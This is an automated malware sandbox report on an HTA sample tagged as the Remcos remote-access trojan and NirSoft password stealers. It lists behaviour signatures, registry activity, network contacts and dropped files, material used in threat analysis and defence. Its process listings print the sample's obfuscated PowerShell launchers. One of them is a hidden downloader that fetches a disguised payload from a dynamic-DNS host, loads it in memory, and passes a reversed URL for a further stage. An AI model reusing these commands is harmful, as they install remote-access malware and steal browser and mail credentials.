Analysis Overview
SHA256
08ddc21fdf4ccd1ae678df5479c23128c933bb11393ca4660e1f6e213b246c64
Threat Level: Known bad
The file af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.zip was found to be: Known bad.
Malicious Activity Summary
Remcos
NirSoft WebBrowserPassView
Detected Nirsoft tools
Credentials from Password Stores: Credentials from Web Browsers
NirSoft MailPassView
Evasion via Device Credential Deployment
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Reads user/profile data of web browsers
Checks computer location settings
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-07 07:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-07 07:17
Reported
2024-08-07 07:17
Platform
win7-20240704-en
Max time kernel
18s
Max time network
16s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.hta"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'[base64 payload removed]'+[chAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'[base64 payload removed]'+[chAR]34+'))')))"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e410m-ly.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D24.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8D23.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('≩ ⫻ ㏤ ≪ ㏴','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BNRT/88/531.291.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
Network
| Country | Destination | Domain | Proto |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
Files
\??\c:\Users\Admin\AppData\Local\Temp\e410m-ly.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\e410m-ly.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\CSC8D23.tmp
C:\Users\Admin\AppData\Local\Temp\RES8D24.tmp
C:\Users\Admin\AppData\Local\Temp\e410m-ly.dll
C:\Users\Admin\AppData\Local\Temp\e410m-ly.pdb
C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
\??\PIPE\srvsvc
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-07 07:17
Reported
2024-08-07 07:20
Platform
win10v2004-20240802-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Remcos
Credentials from Password Stores: Credentials from Web Browsers
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3472 set thread context of 1928 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1928 set thread context of 4312 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1928 set thread context of 2780 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1928 set thread context of 3612 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'[base64 payload removed]'+[chAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'[base64 payload removed]'+[chAR]34+'))')))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES89B2.tmp" "c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\CSC8A85977435C44FDE89D0A35EC9FA1467.TMP"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]
≪ ㏴BC≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴UwBF≩ ⫻ ㏤ ≪ ㏴DY≩ ⫻ ㏤ ≪ ㏴N≩ ⫻ ㏤ ≪ ㏴Bf≩ ⫻ ㏤ ≪ ㏴EU≩ ⫻ ㏤ ≪ ㏴TgBE≩ ⫻ ㏤ ≪ ㏴D4≩ ⫻ ㏤ ≪ ㏴Pg≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴Ek≩ ⫻ ㏤ ≪ ㏴bgBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴BP≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴K≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴aQBt≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴ZwBl≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴TwBm≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴Zg≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBn≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴w≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBn≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴r≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴T≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴ZwB0≩ ⫻ ㏤ ≪ ㏴Gg≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YgBh≩ 
